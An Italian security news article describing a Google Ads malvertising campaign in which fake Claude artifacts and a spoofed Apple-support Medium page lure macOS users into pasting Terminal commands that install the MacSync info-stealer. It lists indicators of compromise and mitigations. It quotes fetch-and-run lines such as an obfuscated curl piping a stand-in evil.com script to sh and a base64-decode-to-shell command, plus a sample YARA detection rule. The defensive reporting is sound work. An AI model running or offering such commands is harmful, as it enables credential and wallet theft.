Attenzione utenti macOS: non eseguire comandi Terminal da fonti online sconosciute!
Gli hacker stanno sfruttando annunci Google sponsorizzati e piattaforme fidate per diffondere malware pericoloso che ruba dati sensibili come credenziali, informazioni browser e wallet di criptovalute. Questa minaccia ha già raggiunto oltre 15.000 potenziali vittime. La soluzione rapida? Verifica sempre le fonti, usa antivirus affidabili e evita di copiare comandi dal Terminal da siti non ufficiali. In questo articolo, ti guideremo passo per passo su come riconoscere e bloccare questi attacchi.
Come funziona l’attacco
I cybercriminali usano tattiche di social engineering per ingannare gli utenti. Immagina di cercare soluzioni comuni su Google, come “risolutore DNS online” o “analizzatore spazio disco macOS CLI”. Invece di risultati legittimi, appaiono annunci sponsorizzati falsi che portano a pagine malevole mascherate da guide ufficiali.
- Primo vettore: Un artefatto Claude AI fasullo intitolato “Esecuzione comandi sicura su macOS” invita a incollare un comando base64-encoded nel Terminal. Questo scarica uno script shell malizioso che installa il MacSync, un info-stealer.
- Secondo vettore: Un articolo Medium fake su “apple-mac-disk-space.medium.com” finge di essere del team supporto Apple, usando la tecnica ClickFix con encoding doppio per eludere i rilevatori.
Questi trucchi sfruttano la fiducia in servizi come Google Ads, Claude AI e Medium, rendendo l’attacco subdolo e efficace.
Perché è pericoloso per te
Una volta eseguito, il malware:
- Si connette a server di comando (come a2abotnet.com) con token hardcoded.
- Spoofa User-Agent dei browser macOS per mimetizzare il traffico.
- Ruba dati da keychain, browser e wallet crypto.
- Comprimi i dati in /tmp/osalogging.zip e li invia via HTTP POST con meccanismi di retry avanzati (fino a 8 tentativi con backoff esponenziale).
- Cancella le tracce per non essere rilevato.
Comandi malevoli usano trucchi come “cur””l” per aggirare filtri YARA e detection basica.
Soluzione immediata per utenti comuni:
- Non cliccare annunci sponsorizzati per tool macOS.
- Installa software solo dall’App Store ufficiale o siti verificati.
- Usa estensioni browser anti-malvertising.
- Esegui scansioni regolari con tool come quelli integrati in macOS o terze parti.
Questa campagna evidenzia un trend crescente: gli attori malevoli abusano di piattaforme legittime per distribuire minacce. Anche se gli annunci vengono rimossi, ne spuntano di nuovi.
Consigli per la protezione quotidiana
Per stare al sicuro:
- Abilita Gatekeeper e verifica sempre le app.
- Monitora connessioni di rete sospette.
- Aggiorna macOS all’ultima versione.
- Educa te stesso: se un sito chiede di eseguire comandi Terminal, chiudi e segnala.
Le organizzazioni dovrebbero deployare EDR (Endpoint Detection and Response) per monitorare attività Terminal e traffico verso domini noti.
Analisi tecnica approfondita
Questa sezione è per esperti IT, sviluppatori e amministratori di sistema che vogliono comprendere i dettagli tecnici della campagna e implementare difese avanzate.
Vettori di attacco dettagliati
Variante 1: Claude Artifact via Google Ads
- Query trigger: “Online dns resolver”.
- Landing: Artefatto pubblico Claude “macOS Secure Command Execution”.
- Payload: Comando base64 che decodifica in shell script:
# Esempio semplificato (non eseguire!) echo 'malicious_base64' | base64 -d | sh - Il script scarica MacSync, che:
- Usa token/API key per C2 su a2abotnet.com/dynamic.
- Spoofing UA: Simula Safari/Chrome macOS.
- Fetch AppleScript per theft: Target Keychain, Safari/Chrome data, ~/Library/Keychains, wallet in
~/Library/. - Exfil: ZIP in
/tmp/osalogging.zip, chunked upload con retry (max 8, backoff 2^x). - Cleanup:
rm -rf /tmp/*staging*.
Variante 2: Medium ClickFix
- Query: “macos cli disk space analyzer”.
- Sito: apple-mac-disk-space.medium.com (impersona Apple Support).
- Tecnica: Double encoding + string obfuscation (es. “cur””l -s http://evil.com | sh”).
- Infra diversa, ma stesso payload MacSync.
Indicatori di compromissione (IoC)
| Tipo | Indicatore | Descrizione |
|---|---|---|
| Dominio | a2abotnet.com | Server C2 |
| Dominio | raxelpak.com | Hosting payload |
| Dominio | apple-mac-disk-space.medium.com | Articolo fake Apple |
| File | /tmp/osalogging.zip | ZIP dati rubati |
| Malware | MacSync | Info-stealer macOS |
Mitigazioni tecniche
- YARA Rules: Crea regole per pattern come base64 + curl + sh, obfuscation tricks.
Esempio base:rule MacSync_Dropper { strings: $s1 = "cur""l" $s2 = "a2abotnet" condition: all of them } - Endpoint Controls:
- Blocca
osascriptnon autorizzato. - Whitelisting app.
- Monitora
network:connecta domini sospetti.
- Blocca
- Rilevamento comportamentale: Alert su exec da /tmp, upload chunked >1MB, UA spoofing.
- Proattivo: Integra threat intel su malvertising Google Ads per macOS tool (Homebrew, CLI utils).
Trend e contesto
Queste campagne fanno parte di un ecosistema MaaS (Malware-as-a-Service) come AMOS/Atomic Stealer, distribuito via Google Ads, fake Homebrew, GitHub clones. Nel 2024-2025, +300% attacchi macOS, target crypto e credenziali. Gruppi come COOKIE SPIDER no-target Russia/CIS.
Per sysadmin: Deploy EDR con behavioral analytics. Testa con payload PoC in lab isolato.
Rimanendo vigili, possiamo ridurre il rischio. Condividi queste info per proteggere la community macOS.
Fonte: https://cybersecuritynews.com/threat-actors-exploit-claude-artifacts-and-google-ads/





